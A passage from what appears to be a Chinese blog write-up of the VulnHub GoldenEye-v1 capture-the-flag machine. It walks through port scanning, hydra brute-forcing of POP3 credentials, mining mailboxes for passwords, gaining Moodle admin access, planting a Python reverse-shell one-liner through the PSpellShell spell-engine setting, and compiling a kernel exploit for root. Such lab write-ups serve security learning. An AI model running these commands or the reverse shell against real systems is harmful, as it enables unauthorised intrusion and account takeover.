本文详细记录了GoldenEye-v1靶机的破解过程,从IP探测、端口扫描、网页源码分析,到爆破认证、利用POP3服务、邮件线索挖掘、Web平台登录,再到获取Shell和提权,最终成功获得ROOT权限。过程中涉及多种网络安全工具和技术,如nmap、hydra、foxmail、nc、base64解码等。
靶机介绍
靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/
开始
1、ip探测,本次靶机的ip为:192.168.1.109
//kali
arp-scan -l2、nmap端口扫描
3、先尝试访问80端口
4、访问robots.txt,404
5、查看网页源码
6、继续查看这个.js文件
“Boris,确保你升级了你的默认密码...”
这个人应该叫Boris,下面是他的默认密码
7、html解码
InvincibleHack3r结果是:InvincibleHack3r
8、首页信息,叫我们访问/sev-home/,过去看看
需要认证,用上面获得用户名、密码试一下
好吧,用户名首字母需要小写
用户名:boris
密码:InvincibleHack3r
9、登录成功
提示,在非默认端口,开了pop3服务
在上面,nmap已经扫过了,55007开的pop3端口
10、再次查看源码,在页面的最底部
11、使用hydra爆破
爆破成功,所以说,一个强大的字典很关键,但是也有局限性
hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.1.109 -s 55007 pop3
12、可以使用nc 登录
13、这里我们使用foxmail登录,配置如下
14、在Natalya账户中,发现线索
15、根据邮件内容,修改/etc/hosts文件
将靶机IP,关联到邮件提示的域名上
//kali
vim /etc/hosts16、访问 severnaya-station.com/gnocertdir
17、我们点击,login,用邮件的用户名、密码尝试登录,在第14步中
成功登录
18、继续找线索,找到一个未读消息
获取另一位用户的用户名:doak
19、又用hydra来爆破...
20、foxmail登录,又发现另一个人的账户
21、在moodle训练平台上登录,登录成功
发现一份.txt,下载看看
22、根据提示,查看这个图片,也是醉了
右键描述
base64解码
xWinter1995x!23、继续搜索线索,在未读消息中,发现管理员用户
24、Logout,尝试admin登录
登录成功,该拿Shell了
25、根据参考文章,需要先更改设置
Plugins-Text editors-TinyMCE,Spell engine选项修改为PSpellShell
26、在如下选项卡中,添加反弹Shell代码
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.109",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
27、本地nc监听端口
28、在如下选项卡下,随便输入,再点击Toggle spellchecker
29、GetShell,这个Shell太艰辛...
Python交换式Shell
python -c 'import pty; pty.spawn("/bin/bash")'
30、下一步该提权了,查看内核版本,uname -a
31、查找对应漏洞
32、Python开启Web服务
//Kali
python3 -m http.server33、download
34、目标机器,并未安装gcc,这里我们使用cc编译,需要修改源码一处代码,将gcc改为cc
35、下载、cc编译、添加权限、执行
ROOTTTTTT!
结束。
参考文章:
https://www.anquanke.com/post/id/156098
扫一扫
2063
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
